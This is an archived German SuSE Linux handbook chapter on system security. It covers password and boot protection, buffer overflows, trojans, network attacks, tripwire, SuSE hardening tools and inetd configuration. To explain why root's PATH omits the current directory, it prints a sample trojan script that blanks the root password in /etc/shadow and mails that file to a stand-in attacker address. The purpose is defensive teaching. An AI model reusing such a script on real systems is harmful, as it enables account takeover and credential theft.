home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2000 May
/
Chip_2000-05_cd2.bin
/
docu
/
ascii
/
suselxde
/
slxde-18.txt
< prev
next >
Wrap
Text File
|
2000-02-29
|
49KB
|
871 lines
Teil VIII
Sicherheit und andere Tipps
457
Kapitel 18
Sicherheit ist Vertrauenssache
18.1 Grundlagen
Bedrohungen aus dem Internet sind aus den heutigen Medien nicht mehr
wegzudenken. Nahezu tΣglich erfΣhrt man von einer neuen Gefahr fⁿr den
heimischen Rechner oder fⁿr das gesamte Firmennetz durch Angriffe aus
dem Internet oder durch Viren. TatsΣchlich jedoch kann vor dieser Art von
Bedrohung auch ein Schutz erworben werden.
Bevor auf einzelne Schutzmechanismen eingegangen werden kann, muss
klargestellt werden, was Sicherheit1 (engl. Security) ⁿberhaupt bedeutet und
vor was man sich schⁿtzen m÷chte. Folgende 6 Punkte machen schnell klar,
dass die Sicherheit eines Rechners ein erstrebenswertes Ziel darstellt:
1. Schutz der Ressourcen
2. Zugang zu Informationen
3. Verfⁿgbarkeit von Daten
4. IntegritΣt der Daten
5. Vertraulichkeit der Daten (Rechtsvorschriften, z. B. Arztpraxen, Banken)
6. PrivatsphΣre
Die GewΣhrleistung dieser 6 Punkte soll das Ziel eines ausgearbeiteten Si-
cherheitskonzeptes sein. Hier muss nicht nur der Schutz vor Zugriffen unbe-
fugter Dritter in Betracht gezogen werden, sondern auch die Gefahren durch
schadhafte Hardware, wie z. B. Festplattencrashs oder defekte Sicherungs-
bΣnder.
Falls Transaktionsdaten auf dem System verarbeitet werden, greifen hier die
gesetzlichen Bestimmungen der GoB (GrundsΣtze ordnungsgemΣ▀er Buch-
fⁿhrung), welche u. a. die Systemverwalter dazu verpflichtet, das System vor
unberechtigten Zugriffen zu schⁿtzen2.
Ein elementarer Bestandteil eines guten Sicherheitskonzeptes ist das re-
gelmΣ▀ige Erstellen von Backups, die auch auf ihre Verwendbarkeit hin
geprⁿft werden sollten.
1 Im amerikanischen Sprachgebrauch findet sich hΣufiger das Wort Trust, das mehr den Grad des
Vertrauens zum Ausdruck bringen soll, welches der Anwender seinem System entgegenbringt.
2 Es greifen noch andere Bestimmungen, z. B. dass die Transaktionsdaten fⁿr mindestens 10 Jah-
re fⁿr Prⁿfungen zur Verfⁿgung stehen.
459
18. Sicherheit ist Vertrauenssache
Zusammengefasst ergeben sich folgende m÷gliche Punkte, in denen die Si-
cherheit eines Computersystems Gefahren ausgesetzt ist:
Benutzer, die direkt an den jeweiligen Computern arbeiten, stellen die gr÷▀-
te aller denkbaren Bedrohungen dar. Dies muss nicht in jedem Fall beab-
sichtigt sein, aber natⁿrlich sind auch gezielte Angriffe durch Mitarbeiter
denkbar.
Kommunikation ⁿber lokale oder Weitverkehrs-Netze, wie auch das Inter-
net, kann einerseits abgeh÷rt werden, andererseits bieten diese Netze An-
griffsm÷glichkeiten, ohne dass der Angreifer sich direkt vor Ort aufhalten
muss.
Direkter Zugriff auf Computer durch Einbrecher oder andere unbefugte
Personen, Diebstahl oder Sabotage.
Naturkatastrophen gegenⁿber sind Computer sehr anfΣllig.
Hardware und Software kann fehlerhaft sein, durch Designfehler oder kon-
krete Defekte, und damit nicht nur den Datenbestand an sich gefΣhrden,
sondern auch eine Kompromittierung erm÷glichen bzw. den Dienst kom-
plett unbrauchbar machen (siehe auch Abschnitt 82 auf Seite 464).
Speichermedien wie Disketten, BΣnder oder Festplatten k÷nnen entwendet
oder (unbeabsichtigt) beschΣdigt werden.
Elektromagnetische Strahlung wird von jedem Computer, Monitor und
Netzwerkkabel emittiert. Die darin enthaltene Information kann mit ge-
eigneten GerΣten empfangen und nutzbar gemacht werden. Diese Strahlen
werden auch ⁿber Rohrleitungen und Stromkabel transportiert, entgegen
der ⁿblichen Meinung strahlen ⁿbrigens auch LCD Monitore Strahlen ab.
Hier soll insbesondere auf die ersten beiden Punkte eingegangen werden, da
gerade in diesen Bereichen durch den planvollen Einsatz von SuSE Linux
Gefahrenpotential weitgehend abgebaut werden kann. Die ⁿbrigen Punkte
sind fⁿr den Privatanwender von SuSE Linux sicherlich weniger interessant,
beim Aufbau eines Firmennetzes sollten sich die zustΣndigen Personenkreise
aber auch hier Gedanken machen.
In Abschnitt 18.1.1 und Abschnitt 18.1.2 auf Seite 463 wird zunΣchst auf die
unterschiedlichen Angriffsformen eingegangen, bevor dann in Abschnitt 18.2
auf Seite 465 auf Seite 465 die einzelnen Werkzeuge, die in SuSE Linux
6.4 zur Verfⁿgung stehen, im Detail vorgestellt werden. Zum Schluss gibt es
einige allgemein gⁿltige Hinweise, die auf jeden Fall beachtet werden sollten.
18.1.1 Lokale Sicherheit
Wer im Glashaus sitzt ... Mit der Sicherheit fΣngt man am besten beim ei-
genen Rechner im lokalen Netz an. Doch auch wenn der Rechner nicht oder
nur temporΣr an einem Netz hΣngt, sollten gewisse Mindestvoraussetzungen
beachtet werden. Schon das L÷schen der Festplatte durch PartygΣste kann zu
einem gro▀en ─rgernis werden, wenn dabei die letzten Ergebnisse der Pro-
motionsarbeit verlorengehen.
460
18.1. Grundlagen
Passw÷rter
Linux als Multiuser-Betriebssystem hat nicht nur ein Benutzerkonzept, son-
dern verfⁿgt auch ⁿber einen Authentifizierungsmechanismus durch die Pass-
wortabfrage. Auch wenn es unbequem erscheint, Sie sollten fⁿr alle Benutzer
auf Ihrem System ein gutes Passwort3 vergeben. Dies gibt Ihrem System zu-
mindest guten Schutz vor dem unbedarften Eindringling. Insbesondere der
Benutzer `root' ist das prominenteste Ziel von Angriffen, hier sollte das
Passwort mit besonderer Sorgfalt gewΣhlt werden.
Doch die besten Passw÷rter k÷nnen nicht helfen, wenn der Eindringling di-
rekten Zugang zu dem Rechner hat und ihn von dort zum Booten bewegen
kann. Mit einer Bootdiskette kann Zugang zum installierten System erlangt
werden. Aus diesem Grund sollten im BIOS-Setup (BIOS) des PC die Dis-
kettenlaufwerke ¡ sofern vorhanden ¡ als bootbare Medien deaktiviert wer-
den.
Damit diese Sperre nicht umgangen werden kann, sollte im gleichen Zug
ein BIOS-Passwort gesetzt werden. Das Passwort selbst darf jedoch auf
gar keinen Fall vergessen werden, ansonsten ist der spΣtere Zugriff auf
das BIOS unm÷glich ¡ au▀er das BIOS wird mittels einer ▄berbrⁿckung
zurⁿck gesetzt.
Falls LILO benutzt wird (vgl. auf Seite 126), sollte in der Datei /etc/
lilo.conf die Option restricted zusammen mit einem Passwort
(z. B. password=sicheres_passwort) eingetragen werden und mit-
tels lilo aktiviert werden. Ansonsten ist es fⁿr jeden m÷glich, der direkt am
Rechner sitzt, das System zu kompromittieren. Das Passwort muss natⁿrlich
sicher gewΣhlt sein, und die Datei /etc/lilo.conf darf nur fⁿr den
Benutzer `root' lesbar sein.
Das Paket john in Serie sec (Sicherheitsrelevante Software) enthΣlt ein Pro-
gramm, um Passw÷rter zu erraten. Dieses kann der umsichtige Administrator
verwenden, um schwache Passw÷rter automatisch erkennen zu lassen, und
die Benutzer anzuweisen, nur sichere Passw÷rter zu verwenden.
Zugriffsrechte
Um die M÷glichkeiten der einzelnen User einzuschrΣnken, beabsichtigt oder
unbeabsichtigt Schaden anzurichten, sollten die User jeweils mit minimalen
Rechten arbeiten. So ist es eine Grundregel, dass nicht jeder Anwender auf
seinem Rechner stets als `root' arbeiten muss; selbst das gut gewΣhlte
Passwort sollte nur den Administratoren bekannt sein.
Buffer Overflows und andere Angriffe
Nach wie vor die beliebteste Methode, `root'-Rechte auf einem Rechner
zu erlangen, sind die so genannten buffer overflows"4. Bei diesen Exploits"
werden statische Felder im User Stack" eines Programms, z. B. wΣhrend
3 ▄ber die Wahl eines guten Passwortes sind schon sehr lange Artikel verfasst worden. In Ab-
schnitt 18.4 auf Seite 474 werden einige Hinweise gegeben.
4 Auch bekannt als stack smashing vulnerabilities".
461
18. Sicherheit ist Vertrauenssache
einer Texteingabe, gezielt mit Werten ⁿberschrieben, die andere Variablen im
User Stack (also der Funktionstack und der Programmheap) ⁿberschreiben, so
dass gewⁿnschter Code ausgefⁿhrt werden kann, etwa das Starten einer Shell.
Betroffen sind hiervon ausschlie▀lich Programme mit statischen Arraygr÷▀en
fⁿr Eingabewerte ohne ▄berprⁿfung auf Pufferⁿberlauf.
Die einzigen attraktiven Programme fⁿr diese Angriffsform sind solche, die
das suid- oder sgid-Bit gesetzt haben, also Programme, die mit den Rechten
des Eigentⁿmers und nicht des aufrufenden Users gestartet werden. ▄blicher-
weise ben÷tigen Programme deshalb suid-root, da sie Aufgaben ausfⁿhren
(wie z. B. passwd), zu denen ein normaler User keine Berechtigung hat. Da-
her ist es das Ziel der Distribution, die Anzahl dieser Programme m÷glichst
gering zu halten und diese gegen derartige Angriffe abzusichern. Neben die-
sen Programmen sind auch die Systemdienste in Form von Daemonen an-
fΣllig fⁿr diese Art Angriff. Weiterhin sollten einschlΣgige Medien beachtet,
sowie bei Bekanntwerden derartiger Lⁿcken verfⁿgbare Updates und Patches
zⁿgig eingespielt werden.
Ein weiterer Angriff auf privilegierte Programme und laufende Dienste sind
so genannte link attacks". Durch unsicheres Arbeiten der Programme in ÷f-
fentlichen Verzeichnissen kann es m÷glich sein, Daten in vollkommen andere
Dateien umzuleiten, und so das System zu kompromittieren oder zum Absturz
zu bringen.
Um die Anzahl der suid- und sgid-Dateien auf dem System zu reduzieren,
kann man bei SuSE Linux mit YaST unter `Administration des
Systems' und `Einstellungen zur Systemsicherheit' im
Auswahlfenster `Rechte auf Dateien werden gesetzt auf:'
auf secure oder paranoid setzen. Welche Rechte dadurch gesetzt wer-
den, k÷nnen Sie in den Dateien /etc/permissions.secure und
/etc/permissions.paranoid nachprⁿfen. Bei paranoid sollte
man sich vor dessen Verwendung jedoch vergewissern, dass die Funktiona-
litΣt des Systems fⁿr die eigenen Bedⁿrfnisse nicht zu sehr eingeschrΣnkt
wird.
Aufgrund seiner KomplexitΣt und des gewachsenen Codes ist das X Window
System (XFree86) immer mal wieder auffΣllig geworden. Mittlerweile hat
sich diese Problematik unter SuSE Linux entschΣrft, da die Server und Libra-
ries nicht mehr suid-root gesetzt sind. Dennoch ergeben sich unter bestimm-
ten UmstΣnden einige MΣngel in der Client-Server Kommunikation. Hier ist
z. B. das Abh÷ren von Tastatureingaben sowie das Auslesen von Fensterin-
halten m÷glich. Unter Beachtung von Regel 3 und der Verwendung von Xau-
thority mittels xauth sowie der Vermeidung von xhost + kann jedoch ein
grundlegendes Ma▀ an Sicherheit erreicht werden. Um remote X-Programme
zu starten, sollte m÷glichst das Paket ssh der Serie sec (Sicherheitsrelevan-
te Software) verwendet werden; im kommerziellen Umfeld beachten Sie bitte
die Lizenzbestimmung (/usr/doc/packages/ssh/COPYING). ssh ist
auch fⁿr die anderen gΣngigen Plattformen verfⁿgbar. Jedoch birgt dieses so
genannte X11-Forwarding seine eigenen Gefahren, bitte erwΣgen Sie auch
ganz darauf zu verzichten.
462
18.1. Grundlagen
Auf kritischen Serversystemen sollte jedoch, schon aus Performance-
Grⁿnden, kein X Window System eingesetzt werden.
Viren und Pferde
Bis vor relativ kurzer Zeit trieben diverse Arten von Viren ihr Unwesen nicht
nur auf Homecomputern, da das Transportieren und Weitergeben von Soft-
ware auf Diskette den idealen NΣhrboden fⁿr diese Programme darstellt. Zum
Glⁿck sind bislang fⁿr Linux gerade mal 2 Viren bekannt. Da fⁿr Linux kaum
Software im BinΣrformat weitergegeben wird und SuSE Linux selbst als vi-
renfrei angesehen werden kann, besteht unter Beachtung von Regel 1 auf Sei-
te 474 keine Gefahr von Viren.
Anders sieht es jedoch mit den immer noch stark zunehmenden Makro-Viren
aus, die vermehrt per E-Mail (in Textverarbeitungsdokumente eingebettet)
verschickt werden. Da das gΣngige Office-Paket unter Linux nicht verfⁿgbar
ist, befinden sich diese Makro-Viren auf SuSE Linux in einer sterilen" Um-
gebung. Aufgrund der Tatsache, dass SuSE Linux vermehrt auf Mail-Servern
als Mail Transfer Agent" eingesetzt wird, bietet sich hier die Gelegenheit,
eingehende und ausgehende Mails automatisch nach eingebetteten Viren zu
scannen.
Die so genannten trojanische Pferde" verdienen eine gesonderte Beachtung.
Diese Programme gaukeln vor, etwas v÷llig anderes zu sein, um im Verbor-
genen ihrem Tun nachzugehen. So kann sich z. B. hinter einem Loginprompt
ein trojanisches Pferd verbergen, welches die ergaunerten Passw÷rter in ei-
ner Datei sammelt oder per E-Mail versendet. Das h÷rt sich vielleicht noch
ganz harmlos an, jedoch spΣtestens wenn es um Kreditkartennummern oder
die PIN zum Girokonto geht, h÷rt der Spa▀ auf. Die Chance, ein trojanisches
Pferd aus dem Internet herunterzuladen oder per E-Mail zu empfangen, ist
relativ gering, jedoch ist es eine ⁿbliche Technik auf einem bereits kompro-
mittierten System einige Trojaner zu hinterlassen, um sich jederzeit wieder
Zugang verschaffen zu k÷nnen. Die Existenz von trojanischen Pferden kann
also als sicherer Indikator fⁿr ein kompromittiertes System dienen.
Einen endgⁿltigen Schutz vor Viren und vor trojanischen Pferden kann es
nicht geben, jedoch kann ein guter Virenscanner sowie ein durchdachter Um-
gang mit Disketten und Fremdprogrammen und die Beachtung der Regeln in
Abschnitt 18.4 auf Seite 474 viel beitragen. Auch die Verwendung von Pro-
grammen wie tripwire, Paket tripwire, Serie sec (Sicherheitsrelevante
Software), siehe auf Seite 466 hilft bei der Erkennung.
18.1.2 Netzwerk-Sicherheit
Kaum mehr ein Rechner steht alleine in der Kammer. Mittlerweile sind gerade
wegen der ausgezeichneten NetzwerkfΣhigkeit von Linux die Rechner im
LAN vernetzt, hΣngen ⁿber Modem oder ISDN im Internet oder dienen als
Gateway fⁿr ganze Subnetze. Dabei besteht fⁿr jeden Rechner die Gefahr
vielfΣltiger Angriffe ⁿber das Netzwerk.
Bei geeigneter Konfiguration eines Firewalls k÷nnen die meisten Angriffs-
formen abgewehrt werden; zwar sind die ge÷ffneten Ports nach wie vor ver-
463
18. Sicherheit ist Vertrauenssache
wundbar, jedoch kann durch den Einsatz weiterer Tools auch hier das Risiko
entschieden vermindert werden.
Die Wahrscheinlichkeit, wΣhrend der 30 Minuten Maillesen ⁿber eine WΣhl-
leitung Ziel eines Angriffs zu werden, kann als gering eingestuft werden.
▄ber permanente Leitungen verbundene Systeme sollten aber auf jeden Fall
geschⁿtzt werden. Die wichtigsten Angriffsformen werden hier kurz vorge-
stellt.
Man in the Middle
Die Man in the Middle"-Angriffe beziehen sich auf Netzwerkverkehr, der
ⁿber einen oder mehrere Rechner zwischen verschiedenen Netzen geroutet
wird. Der Angreifer hat dabei Kontrolle ⁿber einen der Router, kann unter-
wegs IP Pakete abh÷ren, umleiten und austauschen. Da momentan IP-Pakete
nicht authentifiziert sind, ist dieser Angriff leicht m÷glich. Besserung ver-
spricht IPv6, der kommende Standard.
Die einzige Abhilfe gegen diese Art von Angriffen, etwa beim Mailaustausch
oder bei Zugriffen auf WWW-Server, bietet nur der Einsatz starker Krypto-
graphie. Netzverbindungen mit telnet oder rsh k÷nnen im Klartext inklu-
sive Passwort mitgelesen werden. Das ist der hΣufigste Grund fⁿr die Kom-
promitierung eines Systems von au▀en! Hier sollte umgehend auf die Verwen-
dung von ssh gewechselt werden. Zur Signatur vom E-Mails empfiehlt sich
die Verwendung von pgp. Eine verschlⁿsselte ▄bertragung von HTTP-Seiten
kann mit dem SSL5 Protokoll erreicht werden (Verschlⁿsselung). Die Qua-
litΣt der Verschlⁿsselung steht und fΣllt jedoch mit der sicheren ▄bertragung
der Schlⁿssel. Hierbei sollte also besondere Vorsicht walten!
Das Paket modssl in Serie n (Netzwerk) enthΣlt das SSL-Modul fⁿr den
HTTP-Server Paket apache.
Buffer Overflows, die 2.
Nach dem so genannten sniffing", dem passiven Mitlesen von Daten (z. B.
Login und Passwort), sind Buffer Overflows die hΣufigste Art der Kompro-
mittierung von au▀en. Hier gilt: Jeder von au▀en erreichbare Dienst (z. B.
Mail, Webserver, POP3 etc.) stellt ein potentielles Sicherheitsproblem dar. Je-
der Dienst der unbedingt ben÷tigt und nicht abgeschaltet werden kann, soll-
te wenn m÷glich ⁿber eine Firewall-Filter-Konfiguration des Linux-Kernels
(mittels ipchains) nur von bestimmten Systemen erreichbar sein. Wenn
auch das nicht m÷glich ist, sollte versucht werden, den Dienst durch eine
besonders sichere Version zu ersetzten (z. B. Paket postfix anstatt Paket
sendmail). Experten k÷nnen darⁿber hinaus noch jeden Dienst in einer ei-
genen chroot-Umgebung laufen lassen.
Denial of Service
Bei den Denial-of-Service"-Attacken schaltet der Angreifer einen Netz-
dienst durch ▄berlastung gezielt aus. Unter UmstΣnden ist davon dann nicht
nur der einzelne Dienst betroffen, sondern die ganze Maschine kann nicht
5 SSL steht fⁿr Secure Socket Layer.
464
18.2. Tools
mehr erreicht werden. HΣufig wird diese Angriffsform eingesetzt, um einen
Nameserver auszuschalten, damit dessen Funktion ⁿbernommen werden
kann. Nach der ▄bernahme k÷nnen dann Netzwerkpakete an eine andere
Stelle geleitet werden. Denial-of-Service wird zumeist mit IP Spoofing kom-
biniert eingesetzt, um die Herkunft zu verschleiern; vgl. auf dieser Seite.
Daher ist eine Rⁿckverfolgung in den meisten FΣllen aussichtslos. Es muss
einfach besser abgesichert werden.
Zu Denial-of-Service-Angriffen, die zum kompletten Stillstand einer Maschi-
ne fⁿhren k÷nnen, gibt es in der Regel innerhalb von Stunden nach dem Be-
kanntwerden einen Patch. SuSE Linux ist gegen die zum jeweiligen Release-
zeitpunkt bekannten Denial-of-Service Angriffe abgesichert, soweit Patches
vorhanden. Dennoch sollte der verantwortliche Systembetreuer sich stets auf
dem laufenden halten.
IP Spoofing
Das IP Spoofing" bezeichnet eine Technik, die eine Sicherheitslⁿcke im
TCP/IP Protokoll ausnutzt. Dabei wird die Absenderadresse eines TCP/IP-
Paketes nicht ⁿberprⁿft, und kann somit mit einem beliebigen Wert gefⁿllt
werden. Damit kann der Urheber einer Attacke seine Herkunft verschleiern.
ZunΣchst ist es wichtig, den eigenen Router ins externe Netz so zu konfigu-
rieren, dass nur Pakete mit einer externen Absendeadresse ins interne Netz
passieren k÷nnen und nur Pakete mit einer internen Adresse ins externe Netz
geroutet werden.
18.2 Tools
Nun gehen wir darauf ein, welche M÷glichkeiten man hat, mit Hilfe von Tools
das eigene System zu ⁿberwachen und auf evtl. vorhandene Schwachstellen
zu ⁿberprⁿfen. An dieser Stelle soll jedoch noch einmal darauf hingewiesen
sein, dass die potentielle GefΣhrdung eines Rechners immer individuell unter-
schiedlich einzustufen ist. In einem durch einen Firewall geschⁿtzten Netz-
werk bedarf es sicherlich weniger Schutz- und ▄berwachungsma▀nahmen,
als in einem ungeschⁿtzten Netzwerk.
18.2.1 Lokale Tools
Der unumstrittene Vorteil von Linux gegenⁿber anderen Betriebssystemen
ist zum einen die StabilitΣt und zum anderen die Tatsache, dass es sich um
ein Multiuser-Betriebssystem handelt. Letzteres birgt jedoch auch Risiken,
die man nicht unterschΣtzen sollte. So existieren zusΣtzlich zu den bekann-
ten Dateirechten einige, die durch erfahrene Benutzer (Angreifer) ausgenutzt
werden k÷nnten. Die Rede ist vom sog. suid-Bit. Ein Programm, welches
dieses Bit gesetzt hat, bekommt automatisch die Rechte des Benutzers, dem
es geh÷rt. Geh÷rt besagtes Programm dem Superuser, und wird von einem
beliebigen Benutzer gestartet, so hat es im laufenden System die Rechte des
Superusers. Das h÷rt sich jetzt sehr gefΣhrlich an, ist jedoch fⁿr gewisse Funk-
tionalitΣten unumgΣnglich. So muss z. B. das Programm ping mit Superuser-
Rechten ausgefⁿhrt werden. Das wⁿrde bedeuten, dass nur `root' dieses
465
18. Sicherheit ist Vertrauenssache
Programm ausfⁿhren k÷nnte. Aus diesem Grund wird hier das suid-Bit ge-
setzt.
tux@erde:/home/tux > ls -l /bin/ping
-rwsr-xr-x 1 root root 13216 Mar 17 16:36 /bin/ping
Wenn Sie wissen m÷chten, welche Programme in Ihrem System das suid-
Bit gesetzt haben und dem Benutzer `root' geh÷ren, geben Sie einmal
folgendes ein:
tux@erde:/home/tux > find / -uid 0 -perm +4000
Auf diese Weise k÷nnen Sie verdΣchtige" Programme identifizieren. Bei
SuSE Linux k÷nnen Sie mit Hilfe von YaST unter `Administrati-
on des Systems' und `Einstellungen zur Systemsicher-
heit' im Auswahlfenster `Rechte auf Dateien werden ge-
setzt auf:' auf secure setzen. Welche Rechte dadurch gesetzt werden,
k÷nnen Sie in der Datei /etc/permissions.secure nachprⁿfen.
Kaum jemand hat sicherlich die Zeit dazu, seinen oder seine Arbeitsplatz-
rechner stΣndig mit ausgeklⁿgelten Kommandos zu ⁿberwachen. Fⁿr diese
Aufgabe existieren zum Glⁿck Tools, die einem eine Menge Arbeit ersparen
k÷nnen. Auf eines dieser Tools werde ich hier kurz eingehen, da es u. a. auch
vom CERT6 empfohlen wird. Die Rede ist vom Programm tripwire, Paket
tripwire, Serie sec (Sicherheitsrelevante Software).
Tripwire
Die Funktionsweise dieses Programmes ist im Prinzip ganz einfach. Das Pro-
gramm sieht das System durch und speichert Informationen ⁿber und zu Da-
teien in einer Datenbank. Welche Dateien und Verzeichnisse ⁿberwacht und
welche Informationen ⁿberprⁿft werden sollen, lΣsst sich mittels einer Konfi-
gurationsdatei steuern.
Tripwire schaut nicht nach infizierten Dateien oder Fehlern im System. Es
erstellt lediglich eine Datenbank eines Systems, bei dem davon ausgegangen
werden muss, dass es sauber" ist. Deshalb sollte die Datenbank unmittelbar
nach der Installation eines Systems erstellt werden, am Besten bevor der
Rechner an das Netz angeschlossen wird. Mit Hilfe des folgenden Aufrufes
wird eine Datenbank erstellt:
root@erde:root > /var/adm/tripwire/bin/tripwire -init
Tabelle 18.1 auf der nΣchsten Seite zeigt die Pfade auf Datenbank und Kon-
figurationsdatei, die im Paket tripwire aus SuSE Linux fest eincompiliert
wurden.
Die Pfade sind so gewΣhlt, weil nur der Superuser in sein Homeverzeichnis
/root wechseln und hineinsehen kann. Im Idealfall sollte sich die Daten-
bank auf einem Dateisystem befinden, auf das nur lesend zugegriffen werden
kann, z. B. eine schreibgeschⁿtzte Diskette, da sonst ein erfolgreicher An-
greifer seine Manipulationen durch das Anpassen der Datenbank verbergen
6 CERT = engl. Computer Emergency Response Team; siehe http://www.cert.dfn.de/
dfncert/info.html.
466
18.2. Tools
/var/adm/tripwire Datenbank und Konfigurationsdatei
databases Dieses Verzeichnis wird automatisch er-
stellt. Hier werden neu erstellte Datenban-
ken temporΣr abgelegt. Sie mⁿssen dann
von Hand an die richtige Stelle kopiert wer-
den.
/var/adm/ Die Konfigurationsdatei
tripwire/tw.
config
/var/adm/ Hier liegt die Datenbank
tripwire/db
Tabelle 18.1: Die eincompilierten Pfade fⁿr Tripwire
kann. Eine Beispielkonfiguration fⁿr Tripwire finden Sie unter /usr/doc/
packages/tripwire/tw.conf.example.linux. ▄ber Syntax und
Features dieser Konfigurationsdatei finden Sie Informationen in der Manpa-
ge zu tw.config. Es lassen sich hier verschiedene Prⁿfsummenverfahren
individuell auf einzelne Dateien anwenden. Weiterhin kann angegeben wer-
den, welche Informationen einer Datei oder eines Verzeichnisses gespeichert
werden sollen.
Nachdem man seine individuelle Konfigurationsdatei erstellt hat, kann man
tripwire z. B. regelmΣ▀ig als Cronjob ausfⁿhren lassen.
SuSE Security Tools
SuSE Linux hat inzwischen vier eigens entwickelte Sicherheitsprogramme,
die Ihnen helfen, Ihr System sicherer zu machen und dieses zu kontrollieren:
Das Paket firewals, Serie sec (Sicherheitsrelevante Software) enthΣlt
das Skript /usr/sbin/SuSEfirewall, welches die Konfigurationsdatei
/etc/rc.firewall ausliest, und danach restriktive Filterlisten mittels ip-
chains generiert. Mehr Informationen finden Sie unter Abschnitt 18.2.2 auf
Seite 469 Netzwerk-Tools.
Das Paket secchk, Serie sec (Sicherheitsrelevante Software) enthΣlt meh-
rere kleine Skripten, die tΣglich, w÷chentlich und monatlich spezielle Sicher-
heitsⁿberprⁿfungen des Systems vornehmen (z. B. Konsistenz der Passwort-
datei, Benutzerdaten, Passw÷rter knacken, laufende Module), und bei ─nde-
rungen der Administrator benachrichtigt.
Das Paket hardsuse, Serie sec (Sicherheitsrelevante Software) enthΣlt
das Perl-Skript harden_suse (/usr/sbin/harden_suse), welches ent-
wickelt wurde, um Systemverwaltern ein einfach zu bedienendes Programm
zur Erh÷hung der Sicherheit an die Hand zu geben. Nach dem Start wer-
den neun Ja/Nein-Fragen gestellt (z. B. ob alle Dienste deaktiviert werden
sollen, Benutzer-Sicherheit erh÷ht oder suid- und sgid-Dateien minimieren),
um nach den Angaben dann das System umzukonfigurieren. Eine Logda-
tei mit den ─nderungen finden Sie in /etc/harden_suse.log, zudem
467
18. Sicherheit ist Vertrauenssache
werden Sicherheitskopien der geΣnderten Dateien erstellt. Sollte das System
sich anschlie▀end ungewollt verhalten, lassen sich die ─nderungen mittels
/etc/undo_harden_suse wieder zurⁿcksetzen.
Das Paket scslog, Serie sec (Sicherheitsrelevante Software) beinhaltet ein
Kernel-Modul, welches nach dem Laden alle eingehenden und ausgehenden
Netzwerkverbindungen protokolliert; Sie k÷nnen dies automatisieren, indem
Sie es z. B. in die Startup-Dateien einfⁿgen.
Das Paket secumod, Serie sec (Sicherheitsrelevante Software) enthΣlt
ein weiteres Modul, welches Angriffe auf Ihr System verhindert oder er-
schwert. Dazu geh÷ren bis jetzt der Schutz vor Symlink-, Hardlink- und
Pipe-Angriffen, Prozesse k÷nnen auf Wunsch nicht mehr "gestraced" werden
und einiges mehr. Da dieses Paket sehr neu ist, und zum Druckdatum dieses
Buches noch nicht vollstΣndig dokumentiert war, m÷chten wir Sie bitten,
einen Blick in die Dokumentation des Pakets zu werfen.
Durch Logdateien surfen
Eine wichtige Quelle an Informationen sind sicherlich die Dateien, in denen
das System und einzelne Programme Informationen schreiben. Die Rede ist
von Logdateien. Zumindest eine dieser Logdateien sollte man regelmΣ▀ig
durchsehen: die Datei /var/log/messages ¡ hierhin wird unter SuSE
Linux der Gro▀teil der Informationen protokolliert.
Natⁿrlich hat man in den meisten FΣllen keine Zeit und/oder keine Motivati-
on, sich durch diese immer gr÷▀er werdenden Dateien zu graben. Zum Glⁿck
gibt es auch hierfⁿr Hilfsmittel, die einen Gro▀teil der Arbeit erledigen k÷n-
nen. Eines dieser Hilfsmittel ist das Programm logsurfer.
Durch eine Konfigurationsdatei gesteuert, erlaubt es die kontinuierliche ▄ber-
wachung einer Logdatei. Auf bestimmte Meldungen kann hier mit definierten
Aktionen reagiert werden, indem z. B. eine Mail geschickt oder ein externes
Programm gestartet wird.
Beispiele finden sich in der wirklich guten Manual-Page von logsurfer.conf
(man 4 logsurfer.conf).
Die Variable PATH und der Benutzer `root' ...
WΣhrend der Arbeit unter SuSE Linux als Benutzer `root' ist Ihnen si-
cherlich schon aufgefallen, dass das aktuelle Verzeichnis nicht im Suchpfad
vorhanden ist. Das macht sich dadurch bemerkbar, dass Sie vor dem Namen
des auszufⁿhrenden Programmes immer ein ./ voranstellen mⁿssen. Den
Grund dafⁿr verdeutlicht das folgende Szenario:
* Ein Benutzer ist in Ihrem System angemeldet und erstellt das Shell-Skript
in der Art der Datei 18.2.1 auf der nΣchsten Seite.
* Dieses Skript legt er nach /tmp/ls.
* Wenn jetzt `root' nach /tmp wechselt, das aktuelle Verzeichnis ¡ in
diesem Fall /tmp ¡ vor /bin in der Variable PATH eingetragen hat,
so wird anstatt /bin/ls das eben erwΣhnte Skript ausgefⁿhrt, was zur
Folge hat, dass das Root-Passwort entfernt wird und der Benutzer eine
468
18.2. Tools
#!/bin/sh
cp /etc/shadow /etc/shadow.system
cat /etc/shadow.system | \
sed 's;\(^root:\)[^:]*\(:.*\);\1\2;' > /etc/shadow
# rm -f /etc/shadow.system
mailx hacker@hackit.org -s "Root Ac-
count hacked" < /etc/shadow
/bin/ls $*
Datei 18.2.1: Shellskript zum Root-Hack
Mail bekommt, die Ihm sagt, dass er jetzt ohne Passwort einen Root-
Account auf Ihrem Rechner hat. Das ist unsch÷n ;-) .
WΣre das aktuelle Verzeichnis nicht im Suchpfad gewesen, hΣtten Sie explizit
./ls eingeben mⁿssen, um das Skript auszufⁿhren ¡ es handelt sich hierbei
ⁿbrigens um ein Trojanisches Pferd" ( auf Seite 463).
18.2.2 Netzwerk-Tools
Es ist ohne Zweifel sinnvoll und wichtig, einen Rechner, der im Netzwerk
steht, zu beobachten bzw. zu kontrollieren. Im folgenden soll darauf einge-
gangen werden, wie man einen Linux-Rechner m÷glichst sicher vor einem
Angriff aus dem Netz machen kann.
Der inetd
Ein elementarer Ansatz hierfⁿr ist die genau ⁿberlegte Freischaltung der
Dienste (Ports), die der inetd (Internet Super-Server") bereitstellt. Unter
SuSE Linux sind als Voreinstellung einige der gefΣhrlichen" Dienste stan-
dardmΣ▀ig deaktiviert. Es handelt sich hierbei um die internal services" des
inetd. Die Konfigurationsdatei ist /etc/inetd.conf. Aber auch die an-
deren Dienste sollten wohlⁿberlegt freigeschaltet bzw. deaktiviert werden ¡
je nach Bedarf. Wir empfehlen unbedingt einen Blick in die Konfigurations-
datei zu werfen, da standardmΣ▀ig z. B. POP3 und andere Dienste aktiviert
sind! Datei 18.2.2 zeigt eine Auswahl an Diensten, die in den allermeisten
FΣllen vollkommen ausreichend ist.
ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -
wident stream tcp wait nobody /usr/sbin/in.identd in.identd \
-w -e -t120
Datei 18.2.2: Typisches Konfigurationsbeispiel fⁿr den inetd
